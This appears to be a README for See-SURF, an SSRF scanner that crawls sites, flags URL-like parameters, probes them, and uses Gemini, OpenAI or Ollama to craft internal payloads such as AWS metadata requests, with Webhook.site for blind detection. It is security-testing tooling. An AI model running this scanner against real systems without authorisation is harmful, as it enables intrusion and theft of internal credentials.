See-SURF

See-SURF is an AI-powered security scanner designed to detect and validate Server Side Request Forgery (SSRF) vulnerabilities in web applications. It helps protect applications from system and user data compromise by identifying and confirming potential SSRF parameters.

Key Features

• Automated Reconnaissance: Utilizes a multi-threaded crawler to gather and parse data, identifying potential SSRF parameters through strong regex matching (e.g., 'url', 'website', 'IP addresses'). It supports cookie-based authentication for scanning endpoints behind login pages.
• Burp Suite Integration: Can parse Burp Suite sitemaps (.xml) to enhance parameter discovery before crawling.
• Validation & Exploitation: Features AI-powered detection via providers like Google Gemini and OpenAI, analyzing response headers and generating custom payloads. It includes a smart pivot mechanism for targeting internal services (e.g., AWS Metadata) and automated vulnerability validation for Reflected/Non-blind SSRF.
• Blind SSRF Detection: Integrates Out-of-Band (OOB) detection using Webhook.site (default) or user-provided domains to identify vulnerabilities where the server doesn't return a direct response.

How it Works

1. Discovery: The script crawls the target for <a> links and <form> inputs, or parses a Burp sitemap file.
2. Parameter Matching: It identifies keywords in parameter names (e.g., url, redirect, dest) or URL patterns in values.
3. Canary Probing (Non-Blind): Attempts to fetch http://example.com. If the "Example Domain" signature is found, it flags a potential Reflected/Non-Blind SSRF.
4. AI Fingerprinting & Exploitation (Non-Blind): If AI is enabled, it analyzes server headers and tech stack to generate specific internal payloads (e.g., AWS).
5. Validation (Non-Blind): The AI reviews the attack response to verify if sensitive or internal information was returned, reducing false positives.
6. OOBE Probing (Blind): For each potential parameter, a unique Webhook.site payload is generated, and the Webhook API is polled to confirm external requests from the target server.

How to Use

Installation:

git clone https://github.com/In3tinct/See-SURF.git
cd See-SURF/
pip3 install -r requirements.txt

Basic Command:

python3 see-surf.py -H https://www.target.com

AI-Enhanced Scanning (New & Recommended):

# Using Google Gemini
python3 see-surf.py -H http://vulnerable-site.com -p google -m gemini-1.5-flash --api-key YOUR_KEY
 
# Using OpenAI GPT-4
python3 see-surf.py -H http://vulnerable-site.com -p openai -m gpt-4 -a YOUR_KEY
 
# Using local Ollama
python3 see-surf.py -H http://vulnerable-site.com -p ollama -m llama3

Authenticated Scan:

python3 see-surf.py -H https://www.target.com -c "cookie_name1=value1 cookie_name2=value2"

Authenticated with Burp Suite Sitemap:

python3 see-surf.py -H https://www.google.com -c cookie_name1=value1 cookie_name2=value2 -b burp_file.xml